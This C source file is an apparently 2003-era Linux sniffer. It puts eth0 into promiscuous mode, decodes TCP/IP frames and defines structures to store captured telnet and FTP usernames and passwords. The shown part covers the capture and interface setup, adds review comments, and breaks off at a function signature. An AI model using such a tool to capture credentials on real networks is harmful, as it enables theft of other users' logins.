📄 np.c
/**************************************************************************
sniffer.c - description
-------------------
begin : Sun Apr 27 2003
copyright : (C) 2003 by root
email : root@scout
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <net/if_arp.h>
#include <arpa/inet.h>
//#include <socketbits.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <net/if.h>
#include <unistd.h>
#include <ctype.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
//#include <linux/if.h>
#include <signal.h>
#include <stdio.h>
#include <arpa/inet.h>
//#include <linux/socket.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
#include <time.h>
//#include "header.h"
/* Interface flags as read by Inet_SetPromisc() before it turns promiscuous
   mode on (only ifr_flags is filled in there). */
struct ifreq old_ifr;
/* NOTE(review): the telnet* globals below are not referenced in the visible
   part of the file; presumably they are state for the credential parser
   further down -- confirm against getappinfo(). Both buffers are fixed at
   128 bytes, so any writer must bound its copy to sizeof. */
int telnetuserflag,telnetpswflag;
char telnetuser[128];
char telnetpsw[128];
/*
* Ethernet header
*
* 6 + 6 + 2 = 14 bytes, overlaid directly on the start of the receive buffer
* by main(). ether_type is not byte-swapped anywhere in the visible code, so
* it holds the value exactly as it appeared on the wire.
*/
typedef struct _EtherHdr
{
u_int8_t ether_dst[6]; /* destination MAC address */
u_int8_t ether_src[6]; /* source MAC address */
u_int16_t ether_type; /* EtherType of the payload, wire byte order */
} EtherHdr;
/* Leading part of an IPv4 header, meant to be overlaid on captured bytes.
Can't add any fields not in the real header here
because of how the decoder uses structure overlaying.
ip_src/ip_dst are commented out below, so this struct ends after the
checksum and does not cover the address fields.
NOTE(review): the decoder is not visible here; ip_hlen and ip_len come from
the wire and should be range-checked against the captured length before they
are used to locate the TCP header or the payload. */
typedef struct _IPHdr
{
#if defined(WORDS_BIGENDIAN)
u_int8_t ip_ver:4, /* IP version */
ip_hlen:4; /* IP header length */
#else
/* same two nibbles, declared in the opposite order for little-endian bit-field layout */
u_int8_t ip_hlen:4, ip_ver:4;
#endif
u_int8_t ip_tos; /* type of service */
u_int16_t ip_len; /* datagram length */
u_int16_t ip_id; /* identification */
u_int16_t ip_off; /* fragment offset */
u_int8_t ip_ttl; /* time to live field */
u_int8_t ip_proto; /* datagram protocol */
u_int16_t ip_csum; /* checksum */
// struct in_addr ip_src; /* source IP */
//struct in_addr ip_dst; /* dest IP */
} IPHdr;
/* TCP header without options, meant to be overlaid on captured bytes.
Can't add any fields not in the real header here
because of how the decoder uses structure overlaying.
NOTE(review): th_off is taken from the wire; the decoder (not visible here)
should check it against the remaining packet length before deriving the
payload pointer and size. */
typedef struct _TCPHdr
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
u_int32_t th_seq; /* sequence number */
u_int32_t th_ack; /* acknowledgement number */
#ifdef WORDS_BIGENDIAN
u_int8_t th_off:4, /* data offset */
th_x2:4; /* (unused) */
#else
/* same two nibbles, declared in the opposite order for little-endian bit-field layout */
u_int8_t th_x2:4, th_off:4;
#endif
u_int8_t th_flags; /* TCP flag bits */
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
} TCPHdr;
/* Per-frame decode state. main() zeroes it for every received frame and then
   fills pkt, pkt_len and eth; the remaining pointers are presumably set by
   docoderIp()/decodertcp(), which are not visible here. All pointers alias
   the single global receive buffer, so they are only valid until the next
   recvfrom(). */
typedef struct _packet
{
u_int8_t * pkt; /* start of the raw frame */
u_int32_t pkt_len; /* number of bytes actually received */
EtherHdr *eth; /* Ethernet header overlay (same address as pkt) */
IPHdr * iph; /* IP header overlay */
TCPHdr * tcph; /* TCP header overlay */
u_int8_t *data; /* packet payload pointer */
u_int16_t dsize; /* packet payload size */
}packet;
// Service / application information record.
// user_name and user_pass are fixed 128-byte buffers; anything copied into
// them from packet payload must be bounded to sizeof and NUL-terminated.
typedef struct App_Infotag
{ //telnet or ftp etc
unsigned long hostIP; // host IP address
unsigned long app_type; // service type
unsigned char user_name[128]; // user name
unsigned char user_pass[128]; // password
unsigned long source_ip; // source IP
unsigned long source_port; // source port
unsigned long dest_ip; // destination IP
unsigned long dest_port; // destination port
unsigned long App_timer; // timestamp
}App_Info;
// File structure definition (header describing the records stored in the
// output file; how it is written is not visible in this part of the file).
typedef struct filestruct
{
unsigned char infoname[128]; // name of the stored information
long totalrecnum; // total number of records
long reclengch; // length of one record struct
long firstrecoffset; // address (offset) of the first record
long lastrecoffset; // original comment: "length of the last record"; the field name suggests an offset -- confirm
unsigned char space[128]; // padding reserved for future extension, no meaning yet
}file_struct;
/* Receive buffer for one frame; main() passes sizeof(buffer) to recvfrom(). */
u_int8_t buffer[1514];
/* Current application record (see App_Info). */
App_Info app_info;
/* Decode state for the frame currently held in buffer. */
packet p;
/* Output file header (see file_struct). */
file_struct fstruct;
/* Address list read by main() from "Monitor.txt": at most 255 entries of at
   most 17 characters plus the terminating NUL. */
char ip[255][18];
//char port[255][6];
/* i counts the entries loaded into ip[]; j is a shared loop index. */
int i=0,j;
char appinfofilename[128];//="appinfor.txt"; // file name for the application service information
// Function prototypes
/* Opens the raw capture socket for iface; returns the descriptor. */
int Inet_OpenRawSock(char *iface);
/* Saves the interface flags in old_ifr and sets IFF_PROMISC on iface. */
int Inet_SetPromisc(char *iface);
void SetNonBlock(int sock);
/* Registered with atexit() by Inet_SetPromisc(). */
void Inet_Restore_ifr(void);
void decodertcp(packet * p, u_int8_t * pkt_tcph,int len);
/* Called by main() for every frame whose EtherType field matches IPv4. */
void docoderIp(packet * p,u_int8_t * pkt, int packte_len);
void getappinfo(packet p);
/* NOTE(review): some C libraries ship their own memicmp() with a different
   signature; this project-local declaration may clash there -- confirm. */
unsigned char * memicmp(unsigned char * d_str,unsigned char * s_str, int d_len,int s_len);
void writeappinfo(App_Info app_info);
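/*
 * Entry point: load the address list from "Monitor.txt" into ip[], open a
 * raw capture socket on eth0, switch the interface to promiscuous mode and
 * pass every IPv4 frame to docoderIp().
 *
 * Returns EXIT_FAILURE if the address list or the capture socket cannot be
 * opened; otherwise the receive loop never terminates.
 */
int main()
{
    int bytes_received;
    socklen_t fromlen;          /* recvfrom() takes a socklen_t *, not an int * */
    int sock;
    FILE *fto;
    char linebuf[30];
    struct sockaddr_in from;

    fto = fopen("Monitor.txt", "r");
    if (fto == NULL) {
        /* fgets() on a NULL stream is undefined behaviour; fail cleanly instead. */
        perror("fopen(Monitor.txt)");
        return EXIT_FAILURE;
    }

    /*
     * Three bounds are enforced here:
     *  - fgets() gets sizeof(linebuf), so it cannot write past the 30-byte
     *    line buffer;
     *  - "%17s" keeps each token inside its 18-byte row of ip[];
     *  - the row count stops the loop before ip[] itself is overrun.
     * Lines with no token are skipped instead of leaving an empty row.
     */
    while (i < (int)(sizeof(ip) / sizeof(ip[0])) &&
           fgets(linebuf, sizeof(linebuf), fto) != NULL) {
        if (sscanf(linebuf, "%17s", ip[i]) == 1)
            i++;
    }
    fclose(fto);

    for (j = 0; j < i; j++) {   /* echo the loaded list */
        printf("%s\n", ip[j]);
    }

    sock = Inet_OpenRawSock("eth0");
    if (sock < 0)
        return EXIT_FAILURE;    /* Inet_OpenRawSock() has already reported why */
    Inet_SetPromisc("eth0");

    memset(buffer, 0, sizeof(buffer));
    while (1) {
        fromlen = sizeof(from);
        bytes_received = recvfrom(sock, (u_int8_t *)buffer, sizeof(buffer), 0,
                                  (struct sockaddr *)&from, &fromlen);

        /* A frame shorter than the Ethernet header would make the ether_type
           read below return bytes left over from an earlier frame. */
        if (bytes_received < (int)sizeof(EtherHdr))
            continue;

        memset(&p, 0, sizeof(packet));
        p.pkt = buffer;
        p.pkt_len = (u_int32_t)bytes_received;
        p.eth = (EtherHdr *)buffer;

        /* ether_type is in wire byte order; comparing against htons(ETH_P_IP)
           matches IPv4 on both little- and big-endian hosts. */
        if (p.eth->ether_type == htons(ETH_P_IP)) {
            /* NOTE(review): the full frame length is passed although the
               pointer already skips the Ethernet header; docoderIp() is not
               visible here, so the argument is left as it was -- confirm
               which length it expects. */
            docoderIp(&p, p.pkt + sizeof(EtherHdr), p.pkt_len);
        }
    }
}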
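/*
 * Put interface `iface` into promiscuous mode.
 *
 * The current interface flags are read with SIOCGIFFLAGS and saved in the
 * file-scope old_ifr. If IFF_PROMISC is not already set, it is added with
 * SIOCSIFFLAGS and Inet_Restore_ifr() is registered with atexit(). The flag
 * stays visible in the interface flags for as long as it is set.
 *
 * Returns 0 on success, -1 if the helper socket cannot be opened or an
 * ioctl fails (the failure is reported with perror()).
 */
int Inet_SetPromisc(char *iface)
{
    int sock1;
    struct ifreq ifr;

    sock1 = Inet_OpenRawSock(iface);
    if (sock1 < 0)
        return -1;

    memset(&ifr, 0, sizeof(ifr));
    /* Copy at most size-1 bytes: the zeroed last byte keeps ifr_name
       terminated even when iface is too long. */
    strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name) - 1);

    if (ioctl(sock1, SIOCGIFFLAGS, &ifr) < 0) {
        perror("ioctl(SIOCGIFFLAGS)");
        /* ifr_flags is still zero here; continuing would write IFF_PROMISC
           alone and clear every other flag on the interface. */
        close(sock1);
        return -1;
    }

    /* NOTE(review): only ifr_flags is saved; Inet_Restore_ifr() is not
       visible here -- confirm it supplies the interface name itself. */
    memset(&old_ifr, 0, sizeof(old_ifr));
    old_ifr.ifr_flags = ifr.ifr_flags;

    if (!(ifr.ifr_flags & IFF_PROMISC)) {
        ifr.ifr_flags |= IFF_PROMISC;
        if (ioctl(sock1, SIOCSIFFLAGS, &ifr) < 0) {
            perror("ioctl(SIOCSIFFLAGS) | promisc on");
            close(sock1);
            return -1;          /* nothing was changed, so nothing to restore */
        }
        atexit(Inet_Restore_ifr);
    }

    close(sock1);
    return 0;
}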
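/*
 * Open a link-layer capture socket and bind it to interface `iface`.
 *
 * When HAVE_PF_PACKET and NETPACKET_PACKET_H are both defined, a
 * PF_PACKET/SOCK_RAW socket bound by interface index is used; otherwise the
 * code falls back to PF_INET/SOCK_PACKET bound by interface name.
 *
 * Returns the socket descriptor, or the negative value from socket() if the
 * socket could not be created. A bind() failure is only reported; the
 * descriptor is still returned, as before.
 */
int Inet_OpenRawSock(char *iface)
{
    int sock;
#if defined (HAVE_PF_PACKET) && defined (NETPACKET_PACKET_H)
    struct ifreq ifr;
    struct sockaddr_ll sll;
#else
    struct sockaddr sa;
#endif

#if defined (HAVE_PF_PACKET) && defined (NETPACKET_PACKET_H)
    sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
#else
    sock = socket(PF_INET, SOCK_PACKET, htons(ETH_P_ALL));
#endif
    if (sock < 0) {
        perror("socket()");
        /* Do not go on to ioctl()/bind() with an invalid descriptor. */
        return sock;
    }

#if defined (HAVE_PF_PACKET) && defined (NETPACKET_PACKET_H)
    /* NOTE(review): ERROR_MSG and struct sockaddr_ll are not declared in the
       visible part of this file; this branch needs both before it can be
       enabled -- confirm. */
    memset(&ifr, 0, sizeof(ifr));
    /* size-1 so the zeroed last byte keeps the name terminated */
    strncpy(ifr.ifr_name, iface, sizeof(ifr.ifr_name) - 1);
    if (ioctl(sock, SIOCGIFINDEX, &ifr) < 0)
        ERROR_MSG("ioctl(SIOCGIFINDEX)");

    memset(&sll, 0, sizeof(sll));
    sll.sll_family = AF_PACKET;
    sll.sll_ifindex = ifr.ifr_ifindex;
    sll.sll_protocol = htons(ETH_P_ALL);
    if (bind(sock, (struct sockaddr *) &sll, sizeof(sll)) == -1)
        ERROR_MSG("bind()");
#else
    memset(&sa, 0, sizeof(sa));
    /* size-1 so the zeroed last byte keeps the name terminated */
    strncpy(sa.sa_data, iface, sizeof(sa.sa_data) - 1);
    if (bind(sock, &sa, sizeof(sa)) == -1)
        perror("bind()");
#endif
    return sock;
}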
void Inet_Restore_ifr(void)